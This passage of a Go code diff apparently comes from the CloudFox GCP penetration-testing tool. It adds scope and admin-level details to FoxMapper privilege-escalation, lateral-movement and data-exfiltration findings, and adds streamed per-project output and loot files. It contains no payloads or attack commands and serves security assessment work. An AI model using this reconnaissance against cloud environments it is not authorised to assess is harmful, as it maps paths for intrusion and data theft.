for i, edge := range path.Edges { scopeInfo := "" if edge.ScopeBlocksEscalation { @@ -854,6 +858,10 @@ type PrincipalAccess struct { ViaEdge bool `json:"via_edge"` EdgePath []string `json:"edge_path,omitempty"` HasCondition bool `json:"has_condition"` + // Scope information - WHERE the permission was granted + ScopeType string `json:"scope_type,omitempty"` // organization, folder, project + ScopeID string `json:"scope_id,omitempty"` // The org/folder/project ID + ScopeName string `json:"scope_name,omitempty"` // Display name if available } // CategoryInfo provides summary info for a category @@ -1131,6 +1139,9 @@ func (s *FoxMapperService) AnalyzeLateral(category string) []LateralFinding { func (s *FoxMapperService) analyzeLateralFromFindings(category string) []LateralFinding { var findings []LateralFinding + // Get the project ID from the findings data for project-level scope derivation + projectID := s.LateralFindingsData.ProjectID + for _, f := range s.LateralFindingsData.Findings { // Filter by category if specified if category != "" && f.Category != category { @@ -1140,6 +1151,21 @@ func (s *FoxMapperService) analyzeLateralFromFindings(category string) []Lateral // Convert file format to internal format var principals []PrincipalAccess for _, p := range f.Principals { + // Get scope info from JSON fields, Resource, or derive from access_type + scopeType := p.ScopeType + scopeID := p.ScopeID + scopeName := p.ScopeName + + if scopeType == "" { + if p.Resource != "" { + // Resource field exists in JSON + scopeType, scopeID, scopeName = s.parseResourceScope(p.Resource) + } else { + // Derive scope from access_type and available context + scopeType, scopeID, scopeName = s.deriveScopeFromContext(p.MemberID, p.AccessType, p.ViaEdge, projectID) + } + } + principals = append(principals, PrincipalAccess{ Principal: p.Principal, MemberID: p.MemberID, @@ -1149,6 +1175,9 @@ func (s *FoxMapperService) analyzeLateralFromFindings(category string) []Lateral AccessType: p.AccessType, ViaEdge: p.ViaEdge, EdgePath: p.EdgePath, + ScopeType: scopeType, + ScopeID: scopeID, + ScopeName: scopeName, }) } @@ -1186,6 +1215,7 @@ func (s *FoxMapperService) analyzeLateralFromEdges(category string) []LateralFin strings.Contains(edge.ShortReason, tech.Permission) { node := s.GetNode(edge.Source) if node != nil { + scopeType, scopeID, scopeName := s.parseResourceScope(edge.Resource) principals = append(principals, PrincipalAccess{ Principal: node.Email, MemberID: node.MemberID, @@ -1194,6 +1224,9 @@ func (s *FoxMapperService) analyzeLateralFromEdges(category string) []LateralFin IsServiceAccount: node.MemberType == "serviceAccount", AccessType: "via_privesc", ViaEdge: true, + ScopeType: scopeType, + ScopeID: scopeID, + ScopeName: scopeName, }) } } @@ -1334,6 +1367,9 @@ func (s *FoxMapperService) AnalyzeDataExfil(service string) []DataExfilFinding { func (s *FoxMapperService) analyzeDataExfilFromFindings(service string) []DataExfilFinding { var findings []DataExfilFinding + // Get the project ID from the findings data for project-level scope derivation + projectID := s.DataExfilFindingsData.ProjectID + for _, f := range s.DataExfilFindingsData.Findings { // Filter by service if specified if service != "" && f.Service != service { @@ -1343,6 +1379,21 @@ func (s *FoxMapperService) analyzeDataExfilFromFindings(service string) []DataEx // Convert file format to internal format var principals []PrincipalAccess for _, p := range f.Principals { + // Get scope info from JSON fields, Resource, or derive from access_type + scopeType := p.ScopeType + scopeID := p.ScopeID + scopeName := p.ScopeName + + if scopeType == "" { + if p.Resource != "" { + // Resource field exists in JSON + scopeType, scopeID, scopeName = s.parseResourceScope(p.Resource) + } else { + // Derive scope from access_type and available context + scopeType, scopeID, scopeName = s.deriveScopeFromContext(p.MemberID, p.AccessType, p.ViaEdge, projectID) + } + } + principals = append(principals, PrincipalAccess{ Principal: p.Principal, MemberID: p.MemberID, @@ -1352,6 +1403,9 @@ func (s *FoxMapperService) analyzeDataExfilFromFindings(service string) []DataEx AccessType: p.AccessType, ViaEdge: p.ViaEdge, EdgePath: p.EdgePath, + ScopeType: scopeType, + ScopeID: scopeID, + ScopeName: scopeName, }) } @@ -1389,6 +1443,7 @@ func (s *FoxMapperService) analyzeDataExfilFromEdges(service string) []DataExfil strings.Contains(edge.ShortReason, tech.Permission) { node := s.GetNode(edge.Source) if node != nil { + scopeType, scopeID, scopeName := s.parseResourceScope(edge.Resource) principals = append(principals, PrincipalAccess{ Principal: node.Email, MemberID: node.MemberID, @@ -1397,6 +1452,9 @@ func (s *FoxMapperService) analyzeDataExfilFromEdges(service string) []DataExfil IsServiceAccount: node.MemberType == "serviceAccount", AccessType: "via_privesc", ViaEdge: true, + ScopeType: scopeType, + ScopeID: scopeID, + ScopeName: scopeName, }) } } @@ -1443,6 +1501,8 @@ type WrongAdminFinding struct { AdminLevel string `json:"admin_level"` // org, folder, project Reasons []string `json:"reasons"` ProjectID string `json:"project_id"` + FolderID string `json:"folder_id,omitempty"` // For folder-level admins + OrgID string `json:"org_id,omitempty"` // For org-level admins } // ADMIN_ROLES are roles that grant explicit admin access @@ -1484,12 +1544,17 @@ func (s *FoxMapperService) AnalyzeWrongAdmins() []WrongAdminFinding { // This is a "wrong admin" - get reasons why they're admin reasons := s.getAdminReasons(node) + // Get the highest admin resource ID (org, folder, or project) + folderID, orgID := s.getAdminResourceIDs(node) + finding := WrongAdminFinding{ Principal: node.Email, MemberType: node.MemberType, AdminLevel: node.AdminLevel, Reasons: reasons, ProjectID: node.ProjectID, + FolderID: folderID, + OrgID: orgID, } if finding.AdminLevel == "" { @@ -1657,3 +1722,93 @@ func (s *FoxMapperService) getPolicyLevel(resource string) string { } return "project" } + +// getAdminResourceIDs returns the folder ID and org ID where the node has admin access +// Returns the highest level resources (org > folder > project) +func (s *FoxMapperService) getAdminResourceIDs(node *Node) (folderID, orgID string) { + for _, policy := range s.Policies { + for _, binding := range policy.Bindings { + // Check for self-assignment roles (makes them admin) + if !SELF_ASSIGNMENT_ROLES[binding.Role] { + continue + } + + for _, member := range binding.Members { + if s.memberMatchesNode(member, node) { + // Extract resource ID based on type + if strings.HasPrefix(policy.Resource, "organizations/") { + orgID = strings.TrimPrefix(policy.Resource, "organizations/") + } else if strings.HasPrefix(policy.Resource, "folders/") { + // Only set folderID if we don't already have org admin + // (org level is higher) + if orgID == "" { + folderID = strings.TrimPrefix(policy.Resource, "folders/") + } + } + } + } + } + } + return folderID, orgID +} + +// parseResourceScope extracts scope information from a resource string +// Returns scopeType, scopeID, scopeName +// Resource formats: "organizations/123", "folders/456", "projects/myproject", etc. +func (s *FoxMapperService) parseResourceScope(resource string) (scopeType, scopeID, scopeName string) { + if resource == "" { + return "unknown", "", "" + } + + if strings.HasPrefix(resource, "organizations/") { + scopeType = "organization" + scopeID = strings.TrimPrefix(resource, "organizations/") + // Try to get display name from metadata if available + scopeName = scopeID + } else if strings.HasPrefix(resource, "folders/") { + scopeType = "folder" + scopeID = strings.TrimPrefix(resource, "folders/") + scopeName = scopeID + } else if strings.HasPrefix(resource, "projects/") { + scopeType = "project" + scopeID = strings.TrimPrefix(resource, "projects/") + scopeName = scopeID + } else { + // Resource-level permission (e.g., storage bucket, BigQuery dataset) + scopeType = "resource" + scopeID = resource + scopeName = resource + } + + return scopeType, scopeID, scopeName +} + +// deriveScopeFromContext derives scope information when the Resource field is empty +// This is needed for pre-computed findings that don't include the resource field. +// For "project_iam" access type, we know the permission was granted at project level. +// For "via_privesc" access type, we look up the edge to find where the permission was granted. +func (s *FoxMapperService) deriveScopeFromContext(memberID, accessType string, viaEdge bool, fallbackProjectID string) (scopeType, scopeID, scopeName string) { + // For project_iam access, the permission was granted at the project level + if accessType == "project_iam" { + return "project", fallbackProjectID, fallbackProjectID + } + + // For via_privesc with viaEdge=true, look up the edge to find the resource + if viaEdge && accessType == "via_privesc" { + // Find the first edge from this principal to determine scope + for _, edge := range s.Edges { + if edge.Source == memberID { + if edge.Resource != "" { + return s.parseResourceScope(edge.Resource) + } + } + } + } + + // Fallback: if we have a project ID, assume project-level + if fallbackProjectID != "" { + return "project", fallbackProjectID, fallbackProjectID + } + + return "unknown", "", "" +} diff --git a/gcp/services/organizationsService/organizationsService.go b/gcp/services/organizationsService/organizationsService.go old mode 100644 new mode 100755 index 57d98f35..384e4fd2 --- a/gcp/services/organizationsService/organizationsService.go +++ b/gcp/services/organizationsService/organizationsService.go @@ -102,6 +102,7 @@ func (s *OrganizationsService) SearchOrganizations() ([]OrganizationInfo, error) orgInfo := OrganizationInfo{ Name: org.Name, DisplayName: org.DisplayName, + DirectoryID: org.GetDirectoryCustomerId(), State: org.State.String(), } if org.CreateTime != nil { diff --git a/gcp/services/serviceAgentsService/serviceAgentsService.go b/gcp/services/serviceAgentsService/serviceAgentsService.go index 06a28995..fbc209bd 100644 --- a/gcp/services/serviceAgentsService/serviceAgentsService.go +++ b/gcp/services/serviceAgentsService/serviceAgentsService.go @@ -123,14 +123,21 @@ func (s *ServiceAgentsService) getResourceManagerService(ctx context.Context) (* return cloudresourcemanager.NewService(ctx) } -// GetServiceAgents retrieves all service agents with IAM bindings -func (s *ServiceAgentsService) GetServiceAgents(projectID string) ([]ServiceAgentInfo, error) { +// GetServiceAgents retrieves all service agents with IAM bindings. +// If orgCache is provided, it resolves project numbers to IDs for accurate cross-project detection. +func (s *ServiceAgentsService) GetServiceAgents(projectID string, orgCache ...*gcpinternal.OrgCache) ([]ServiceAgentInfo, error) { ctx := context.Background() service, err := s.getResourceManagerService(ctx) if err != nil { return nil, gcpinternal.ParseGCPError(err, "cloudresourcemanager.googleapis.com") } + // Get optional OrgCache + var cache *gcpinternal.OrgCache + if len(orgCache) > 0 { + cache = orgCache[0] + } + var agents []ServiceAgentInfo // Get IAM policy @@ -156,11 +163,19 @@ func (s *ServiceAgentsService) GetServiceAgents(projectID string) ([]ServiceAgen continue // Not a service agent } - // Extract source project from email + // Extract source project from email (may be a project number or ID) sourceProject := s.extractSourceProject(email) - // Check for cross-project access - isCrossProject := sourceProject != "" && sourceProject != projectID + // Resolve project number to ID using OrgCache if available + sourceProjectID := sourceProject + if cache != nil && cache.IsPopulated() && sourceProject != "" { + if resolved := cache.GetProjectIDByNumber(sourceProject); resolved != "" { + sourceProjectID = resolved + } + } + + // Check for cross-project access using resolved ID + isCrossProject := sourceProjectID != "" && sourceProjectID != projectID // Add or update agent if agent, exists := seenAgents[email]; exists { @@ -169,7 +184,7 @@ func (s *ServiceAgentsService) GetServiceAgents(projectID string) ([]ServiceAgen agent := &ServiceAgentInfo{ Email: email, ProjectID: projectID, - SourceProject: sourceProject, + SourceProject: sourceProjectID, ServiceName: agentType, AgentType: agentType, Roles: []string{binding.Role}, diff --git a/globals/gcp.go b/globals/gcp.go index dac65acf..01dae47a 100644 --- a/globals/gcp.go +++ b/globals/gcp.go @@ -35,6 +35,7 @@ const GCP_SPANNER_MODULE_NAME string = "spanner" const GCP_BIGTABLE_MODULE_NAME string = "bigtable" const GCP_VPCSC_MODULE_NAME string = "vpc-sc" const GCP_WORKLOAD_IDENTITY_MODULE_NAME string = "workload-identity" +const GCP_IDENTITY_FEDERATION_MODULE_NAME string = "identity-federation" const GCP_ASSET_INVENTORY_MODULE_NAME string = "asset-inventory" const GCP_LOADBALANCERS_MODULE_NAME string = "loadbalancers" const GCP_VPCNETWORKS_MODULE_NAME string = "vpc-networks" diff --git a/internal/gcp/foxmapper_cache.go b/internal/gcp/foxmapper_cache.go old mode 100644 new mode 100755 index f6edac7d..e12edb29 --- a/internal/gcp/foxmapper_cache.go +++ b/internal/gcp/foxmapper_cache.go @@ -183,6 +183,49 @@ func (c *FoxMapperCache) HasPrivesc(serviceAccount string) (bool, string) { return false, "" } +// GetAdminStatus returns the admin status for a principal from FoxMapper data +// Returns: isAdmin (bool), adminLevel (string: "Org", "Folder", "Project", or "") +func (c *FoxMapperCache) GetAdminStatus(principal string) (bool, string) { + if !c.populated { + return false, "" + } + + // Clean the principal - remove prefixes if present + cleanPrincipal := principal + if strings.HasPrefix(principal, "serviceAccount:") { + cleanPrincipal = strings.TrimPrefix(principal, "serviceAccount:") + } else if strings.HasPrefix(principal, "user:") { + cleanPrincipal = strings.TrimPrefix(principal, "user:") + } else if strings.HasPrefix(principal, "group:") { + cleanPrincipal = strings.TrimPrefix(principal, "group:") + } + + node := c.service.GetNode(cleanPrincipal) + if node == nil { + return false, "" + } + + if node.IsAdmin { + level := node.AdminLevel + // Capitalize for display + switch level { + case "org": + return true, "Org" + case "folder": + return true, "Folder" + case "project": + return true, "Project" + default: + if level == "" { + return true, "Project" // Default to project if not specified + } + return true, level + } + } + + return false, "" +} + // Context key for FoxMapper cache type foxMapperCacheKey struct{} @@ -308,3 +351,17 @@ func GetAttackSummaryFromCaches(foxMapperCache *FoxMapperCache, _ interface{}, p return "run foxmapper" } + +// GetAdminStatusFromCache returns admin status from FoxMapper cache +// Returns the admin level (Org/Folder/Project) if admin, empty string otherwise +func GetAdminStatusFromCache(foxMapperCache *FoxMapperCache, principal string) string { + if foxMapperCache == nil || !foxMapperCache.IsPopulated() { + return "" + } + + isAdmin, level := foxMapperCache.GetAdminStatus(principal) + if isAdmin { + return level + } + return "" +} diff --git a/internal/gcp/org_cache.go b/internal/gcp/org_cache.go old mode 100644 new mode 100755 index fedf5a05..25b71dc0 --- a/internal/gcp/org_cache.go +++ b/internal/gcp/org_cache.go @@ -18,9 +18,10 @@ type OrgCache struct { AllProjects []CachedProject // Quick lookups - ProjectByID map[string]*CachedProject - FolderByID map[string]*CachedFolder - OrgByID map[string]*CachedOrganization + ProjectByID map[string]*CachedProject + ProjectByNumber map[string]*CachedProject + FolderByID map[string]*CachedFolder + OrgByID map[string]*CachedOrganization // Populated indicates whether the cache has been populated Populated bool @@ -33,6 +34,8 @@ type CachedOrganization struct { ID string // Numeric org ID Name string // organizations/ORGID DisplayName string + DirectoryID string // Cloud Identity directory customer ID + State string // ACTIVE, DELETE_REQUESTED, etc. } // CachedFolder represents cached folder info @@ -41,12 +44,14 @@ type CachedFolder struct { Name string // folders/FOLDERID DisplayName string Parent string // Parent org or folder + State string // ACTIVE, DELETE_REQUESTED, etc. } // CachedProject represents cached project info type CachedProject struct { - ID string // Project ID - Name string // projects/PROJECTID + ID string // Project ID (e.g. "my-project") + Number string // Project number (e.g. "123456789") + Name string // projects/PROJECT_NUMBER DisplayName string Parent string // Parent org or folder State string // ACTIVE, DELETE_REQUESTED, etc. @@ -55,13 +60,14 @@ type CachedProject struct { // NewOrgCache creates a new empty org cache func NewOrgCache() *OrgCache { return &OrgCache{ - Organizations: []CachedOrganization{}, - Folders: []CachedFolder{}, - AllProjects: []CachedProject{}, - ProjectByID: make(map[string]*CachedProject), - FolderByID: make(map[string]*CachedFolder), - OrgByID: make(map[string]*CachedOrganization), - Populated: false, + Organizations: []CachedOrganization{}, + Folders: []CachedFolder{}, + AllProjects: []CachedProject{}, + ProjectByID: make(map[string]*CachedProject), + ProjectByNumber: make(map[string]*CachedProject), + FolderByID: make(map[string]*CachedFolder), + OrgByID: make(map[string]*CachedOrganization), + Populated: false, } } @@ -89,7 +95,11 @@ func (c *OrgCache) AddProject(project CachedProject) { defer c.mu.Unlock() c.AllProjects = append(c.AllProjects, project) - c.ProjectByID[project.ID] = &c.AllProjects[len(c.AllProjects)-1] + ptr := &c.AllProjects[len(c.AllProjects)-1] + c.ProjectByID[project.ID] = ptr + if project.Number != "" { + c.ProjectByNumber[project.Number] = ptr + } } // MarkPopulated marks the cache as populated @@ -139,6 +149,17 @@ func (c *OrgCache) GetProject(projectID string) *CachedProject { return c.ProjectByID[projectID] } +// GetProjectIDByNumber returns the project ID for a given project number. +// Returns empty string if not found. +func (c *OrgCache) GetProjectIDByNumber(number string) string { + c.mu.RLock() + defer c.mu.RUnlock() + if p, ok := c.ProjectByNumber[number]; ok { + return p.ID + } + return "" +} + // GetFolder returns a folder by ID func (c *OrgCache) GetFolder(folderID string) *CachedFolder { c.mu.RLock() @@ -216,6 +237,86 @@ func (c *OrgCache) GetProjectsInOrg(orgID string) []string { return ids } +// GetProjectAncestorFolders returns all folder IDs in the ancestry path for a project. +// This walks up from the project's parent through all nested folders. +func (c *OrgCache) GetProjectAncestorFolders(projectID string) []string { + c.mu.RLock() + defer c.mu.RUnlock() + + project := c.ProjectByID[projectID] + if project == nil { + return nil + } + + var folderIDs []string + currentParent := project.Parent + + // Walk up the folder chain + for { + if currentParent == "" { + break + } + + // Check if parent is a folder + if len(currentParent) > 8 && currentParent[:8] == "folders/" { + folderID := currentParent[8:] + folderIDs = append(folderIDs, folderID) + + // Get next parent + if folder := c.FolderByID[folderID]; folder != nil { + currentParent = folder.Parent + } else { + break + } + } else { + // Parent is an org or unknown, stop here + break + } + } + + return folderIDs +} + +// GetProjectOrgID returns the organization ID for a project. +// Returns empty string if the project is not found or has no org. +func (c *OrgCache) GetProjectOrgID(projectID string) string { + c.mu.RLock() + defer c.mu.RUnlock() + + project := c.ProjectByID[projectID] + if project == nil { + return "" + } + + currentParent := project.Parent + + // Walk up until we find an org + for { + if currentParent == "" { + break + } + + // Check if parent is an org + if len(currentParent) > 14 && currentParent[:14] == "organizations/" { + return currentParent[14:] + } + + // Check if parent is a folder + if len(currentParent) > 8 && currentParent[:8] == "folders/" { + folderID := currentParent[8:] + if folder := c.FolderByID[folderID]; folder != nil { + currentParent = folder.Parent + } else { + break + } + } else { + break + } + } + + return "" +} + // Context key for org cache type orgCacheKey struct{} diff --git a/internal/output2.go b/internal/output2.go old mode 100644 new mode 100755 index 313c9c5a..171a90bd --- a/internal/output2.go +++ b/internal/output2.go @@ -1213,6 +1213,7 @@ func formatNumberWithCommas(n int) string { // HierarchicalOutputData represents output data organized by scope for hierarchical output type HierarchicalOutputData struct { OrgLevelData map[string]CloudfoxOutput // orgID -> org-level data + FolderLevelData map[string]CloudfoxOutput // folderID -> folder-level data ProjectLevelData map[string]CloudfoxOutput // projectID -> project data } @@ -1253,6 +1254,14 @@ func HandleHierarchicalOutput( } } + // Write folder-level data (if any) + for folderID, folderData := range outputData.FolderLevelData { + outPath := pathBuilder("folder", folderID) + if err := writeOutputToPath(outPath, format, verbosity, wrap, folderData, logger); err != nil { + return fmt.Errorf("failed to write folder-level output for %s: %w", folderID, err) + } + } + // Write project-level data for projectID, projectData := range outputData.ProjectLevelData { outPath := pathBuilder("project", projectID) @@ -1316,6 +1325,14 @@ func HandleHierarchicalOutputStreaming( } } + // Stream folder-level data (if any) + for folderID, folderData := range outputData.FolderLevelData { + outPath := pathBuilder("folder", folderID) + if err := streamOutputToPath(outPath, format, verbosity, wrap, folderData, logger); err != nil { + return fmt.Errorf("failed to stream folder-level output for %s: %w", folderID, err) + } + } + // Stream project-level data for projectID, projectData := range outputData.ProjectLevelData { outPath := pathBuilder("project", projectID) @@ -1456,6 +1473,11 @@ func HandleHierarchicalOutputSmart( totalRows += len(tableFile.Body) } } + for _, folderData := range outputData.FolderLevelData { + for _, tableFile := range folderData.TableFiles() { + totalRows += len(tableFile.Body) + } + } for _, projectData := range outputData.ProjectLevelData { for _, tableFile := range projectData.TableFiles() { totalRows += len(tableFile.Body) @@ -1488,3 +1510,473 @@ func HandleHierarchicalOutputSmart( // Use normal in-memory output for smaller datasets return HandleHierarchicalOutput(cloudProvider, format, verbosity, wrap, pathBuilder, outputData) } + +// ============================================================================ +// SINGLE-PASS TEE STREAMING - Efficient hierarchical output with row routing +// ============================================================================ + +// RowRouter is a function that determines which project IDs a row belongs to. +// Given a row (slice of strings), it returns the project IDs that should receive this row. +// The row is always written to org-level; this determines additional project-level routing. +type RowRouter func(row []string) []string + +// ProjectLootCollector is a function that returns loot files for a specific project. +// This allows modules to provide inheritance-aware loot (e.g., org + folder + project loot). +type ProjectLootCollector func(projectID string) []LootFile + +// TeeStreamingConfig holds configuration for single-pass tee streaming output +type TeeStreamingConfig struct { + // OrgID is the organization ID for org-level output + OrgID string + + // ProjectIDs is the list of all project IDs that may receive output + ProjectIDs []string + + // Tables contains the table data to stream (header + body) + Tables []TableFile + + // LootFiles contains loot files to write to org level + LootFiles []LootFile + + // ProjectLootCollector returns loot files for a specific project (with inheritance). + // If nil, no loot is written to project directories. + ProjectLootCollector ProjectLootCollector + + // RowRouter determines which projects each row belongs to + // If nil, rows are only written to org level + RowRouter RowRouter + + // PathBuilder builds output paths for each scope + PathBuilder PathBuilder + + // Format is the output format ("all", "csv", "json", "table") + Format string + + // Verbosity level for console output + Verbosity int + + // Wrap enables table wrapping + Wrap bool +} + +// teeStreamWriter manages multiple output file handles for tee streaming +type teeStreamWriter struct { + // orgWriters holds file writers for org-level output (format -> file) + orgCSV *os.File + orgJSON *os.File + orgTable *os.File + + // projectWriters holds file writers for each project (projectID -> format -> file) + projectCSV map[string]*os.File + projectJSON map[string]*os.File + projectTable map[string]*os.File + + // Track which projects have had headers written + projectHeaderWritten map[string]bool + + // Configuration + format string + outPath string +} + +// HandleHierarchicalOutputTee performs single-pass streaming with tee to multiple outputs. +// This is the most efficient method for large datasets that need both org-level and per-project output. +// +// Instead of streaming org data first, then streaming each project's filtered data separately, +// this function streams through the data once and writes each row to: +// 1. The org-level output (always) +// 2. Any project-level outputs determined by the RowRouter function +// +// This reduces I/O and processing time significantly for large datasets. +func HandleHierarchicalOutputTee(config TeeStreamingConfig) error { + logger := NewLogger() + + if config.OrgID == "" { + return fmt.Errorf("OrgID is required for tee streaming") + } + + // Get base module name for logging + baseCloudfoxModule := "" + if len(config.Tables) > 0 { + baseCloudfoxModule = config.Tables[0].Name + } + + // Build output paths + orgPath := config.PathBuilder("organization", config.OrgID) + projectPaths := make(map[string]string) + for _, projectID := range config.ProjectIDs { + projectPaths[projectID] = config.PathBuilder("project", projectID) + } + + // Track which projects received data (for loot file generation) + projectsWithData := make(map[string]bool) + + // Process each table + for _, t := range config.Tables { + if config.Verbosity > 0 { + tmpClient := TableClient{Wrap: config.Wrap} + tmpClient.printTablesToScreen([]TableFile{t}) + } + + safeName := sanitizeFileName(t.Name) + + // Initialize writers + writer := &teeStreamWriter{ + projectCSV: make(map[string]*os.File), + projectJSON: make(map[string]*os.File), + projectTable: make(map[string]*os.File), + projectHeaderWritten: make(map[string]bool), + format: config.Format, + } + + // Open org-level files + if err := writer.openOrgFiles(orgPath, safeName, config.Format); err != nil { + return fmt.Errorf("failed to open org files: %w", err) + } + + // Write org-level headers + if err := writer.writeOrgHeader(t.Header, config.Format); err != nil { + writer.closeAll() + return fmt.Errorf("failed to write org header: %w", err) + } + + // Pre-open project files if we have a router + if config.RowRouter != nil { + for projectID, projectPath := range projectPaths { + if err := writer.openProjectFiles(projectID, projectPath, safeName, config.Format); err != nil { + writer.closeAll() + return fmt.Errorf("failed to open project files for %s: %w", projectID, err) + } + } + } + + // Stream each row + for _, row := range t.Body { + cleanRow := removeColorCodesFromSlice(row) + + // Always write to org level + if err := writer.writeOrgRow(cleanRow, config.Format); err != nil { + writer.closeAll() + return fmt.Errorf("failed to write org row: %w", err) + } + + // Route to projects if router is configured + if config.RowRouter != nil { + targetProjects := config.RowRouter(row) + for _, projectID := range targetProjects { + // Track that this project has data + projectsWithData[projectID] = true + + // Write header if this is the first row for this project + if !writer.projectHeaderWritten[projectID] { + if err := writer.writeProjectHeader(projectID, t.Header, config.Format); err != nil { + writer.closeAll() + return fmt.Errorf("failed to write project header for %s: %w", projectID, err) + } + writer.projectHeaderWritten[projectID] = true + } + + if err := writer.writeProjectRow(projectID, cleanRow, config.Format); err != nil { + writer.closeAll() + return fmt.Errorf("failed to write project row for %s: %w", projectID, err) + } + } + } + } + + // Close all files + writer.closeAll() + + // Log output paths + if config.Format == "all" || config.Format == "csv" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(orgPath, "csv", safeName+".csv")), baseCloudfoxModule) + } + if config.Format == "all" || config.Format == "json" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(orgPath, "json", safeName+".jsonl")), baseCloudfoxModule) + } + if config.Format == "all" || config.Format == "table" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(orgPath, "table", safeName+".txt")), baseCloudfoxModule) + } + + // Log project outputs (only for projects that received data) + for projectID := range writer.projectHeaderWritten { + projectPath := projectPaths[projectID] + if config.Format == "all" || config.Format == "csv" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(projectPath, "csv", safeName+".csv")), baseCloudfoxModule) + } + if config.Format == "all" || config.Format == "json" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(projectPath, "json", safeName+".jsonl")), baseCloudfoxModule) + } + if config.Format == "all" || config.Format == "table" { + logger.InfoM(fmt.Sprintf("Output written to %s", filepath.Join(projectPath, "table", safeName+".txt")), baseCloudfoxModule) + } + } + } + + // Write loot files to org level + for _, l := range config.LootFiles { + lootDir := filepath.Join(orgPath, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return fmt.Errorf("failed to create loot directory: %w", err) + } + + lootPath := filepath.Join(lootDir, l.Name+".txt") + if err := os.WriteFile(lootPath, []byte(l.Contents), 0644); err != nil { + return fmt.Errorf("failed to write loot file: %w", err) + } + + logger.InfoM(fmt.Sprintf("Output written to %s", lootPath), baseCloudfoxModule) + } + + // Write per-project loot files (with inheritance) if collector is provided + if config.ProjectLootCollector != nil { + for projectID := range projectsWithData { + projectPath := projectPaths[projectID] + projectLootFiles := config.ProjectLootCollector(projectID) + + for _, l := range projectLootFiles { + lootDir := filepath.Join(projectPath, "loot") + if err := os.MkdirAll(lootDir, 0o755); err != nil { + return fmt.Errorf("failed to create project loot directory: %w", err) + } + + lootPath := filepath.Join(lootDir, l.Name+".txt") + if err := os.WriteFile(lootPath, []byte(l.Contents), 0644); err != nil { + return fmt.Errorf("failed to write project loot file: %w", err) + } + + logger.InfoM(fmt.Sprintf("Output written to %s", lootPath), baseCloudfoxModule) + } + } + } + + return nil +} + +// openOrgFiles opens output files for org-level output +func (w *teeStreamWriter) openOrgFiles(orgPath, safeName, format string) error { + var err error + + if format == "all" || format == "csv" { + csvDir := filepath.Join(orgPath, "csv") + if err = os.MkdirAll(csvDir, 0o755); err != nil { + return err + } + w.orgCSV, err = os.OpenFile(filepath.Join(csvDir, safeName+".csv"), os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return err + } + } + + if format == "all" || format == "json" { + jsonDir := filepath.Join(orgPath, "json") + if err = os.MkdirAll(jsonDir, 0o755); err != nil { + return err + } + w.orgJSON, err = os.OpenFile(filepath.Join(jsonDir, safeName+".jsonl"), os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return err + } + } + + if format == "all" || format == "table" { + tableDir := filepath.Join(orgPath, "table") + if err = os.MkdirAll(tableDir, 0o755); err != nil { + return err + } + w.orgTable, err = os.OpenFile(filepath.Join(tableDir, safeName+".txt"), os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return err + } + } + + return nil +} + +// openProjectFiles opens output files for a specific project +func (w *teeStreamWriter) openProjectFiles(projectID, projectPath, safeName, format string) error { + var err error + + if format == "all" || format == "csv" { + csvDir := filepath.Join(projectPath, "csv") + if err = os.MkdirAll(csvDir, 0o755); err != nil { + return err + } + w.projectCSV[projectID], err = os.OpenFile(filepath.Join(csvDir, safeName+".csv"), os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return err + } + } + + if format == "all" || format == "json" { + jsonDir := filepath.Join(projectPath, "json") + if err = os.MkdirAll(jsonDir, 0o755); err != nil { + return err + } + w.projectJSON[projectID], err = os.OpenFile(filepath.Join(jsonDir, safeName+".jsonl"), os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return err + } + } + + if format == "all" || format == "table" { + tableDir := filepath.Join(projectPath, "table") + if err = os.MkdirAll(tableDir, 0o755); err != nil { + return err + } + w.projectTable[projectID], err = os.OpenFile(filepath.Join(tableDir, safeName+".txt"), os.O_CREATE|os.O_WRONLY|os.O_TRUNC, 0644) + if err != nil { + return err + } + } + + return nil +} + +// writeOrgHeader writes header to org-level files +func (w *teeStreamWriter) writeOrgHeader(header []string, format string) error { + if format == "all" || format == "csv" { + if w.orgCSV != nil { + _, err := w.orgCSV.WriteString(strings.Join(header, ",") + "\n") + if err != nil { + return err + } + } + } + + if format == "all" || format == "table" { + if w.orgTable != nil { + _, err := w.orgTable.WriteString(strings.Join(header, "\t") + "\n") + if err != nil { + return err + } + } + } + + // JSON doesn't need a header line (each row is self-contained) + return nil +} + +// writeProjectHeader writes header to project-level files +func (w *teeStreamWriter) writeProjectHeader(projectID string, header []string, format string) error { + if format == "all" || format == "csv" { + if f := w.projectCSV[projectID]; f != nil { + _, err := f.WriteString(strings.Join(header, ",") + "\n") + if err != nil { + return err + } + } + } + + if format == "all" || format == "table" { + if f := w.projectTable[projectID]; f != nil { + _, err := f.WriteString(strings.Join(header, "\t") + "\n") + if err != nil { + return err + } + } + } + + return nil +} + +// writeOrgRow writes a row to org-level files +func (w *teeStreamWriter) writeOrgRow(row []string, format string) error { + if format == "all" || format == "csv" { + if w.orgCSV != nil { + _, err := w.orgCSV.WriteString(strings.Join(row, ",") + "\n") + if err != nil { + return err + } + } + } + + if format == "all" || format == "json" { + if w.orgJSON != nil { + jsonBytes, err := json.Marshal(row) + if err != nil { + return err + } + _, err = w.orgJSON.WriteString(string(jsonBytes) + "\n") + if err != nil { + return err + } + } + } + + if format == "all" || format == "table" { + if w.orgTable != nil { + _, err := w.orgTable.WriteString(strings.Join(row, "\t") + "\n") + if err != nil { + return err + } + } + } + + return nil +} + +// writeProjectRow writes a row to project-level files +func (w *teeStreamWriter) writeProjectRow(projectID string, row []string, format string) error { + if format == "all" || format == "csv" { + if f := w.projectCSV[projectID]; f != nil { + _, err := f.WriteString(strings.Join(row, ",") + "\n") + if err != nil { + return err + } + } + } + + if format == "all" || format == "json" { + if f := w.projectJSON[projectID]; f != nil { + jsonBytes, err := json.Marshal(row) + if err != nil { + return err + } + _, err = f.WriteString(string(jsonBytes) + "\n") + if err != nil { + return err + } + } + } + + if format == "all" || format == "table" { + if f := w.projectTable[projectID]; f != nil 